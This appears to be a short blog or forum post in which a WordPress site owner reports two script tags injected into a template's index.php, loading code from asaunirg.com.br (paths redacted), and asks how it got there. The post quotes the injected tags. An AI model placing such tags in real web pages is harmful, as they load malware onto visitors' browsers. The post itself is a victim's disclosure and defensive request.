WordPress malware script injection asaunirg.com.br facesta.com.br 0day.php

Something modified the index.php of my template to add this two lines of code before the tag (I deleted some part of the script for security reasons).

<script type="text/javascript" src="http://asaunirg.com.br/******"></script>
<script type="text/javascript" src="http://asaunirg.com.br/******"></script>

They open two iframes, a java applet and add a few scripts to the . Along with asaunirg.com.br it tries to connect to another site called facesta.com.br.

Read More

I solved it deleting the first two lines (the malicious scripts shown above) in the index.php file at my template folder. Does anyone have a clue of how could this malicious code be injected to my website?

Related posts

Leave a Reply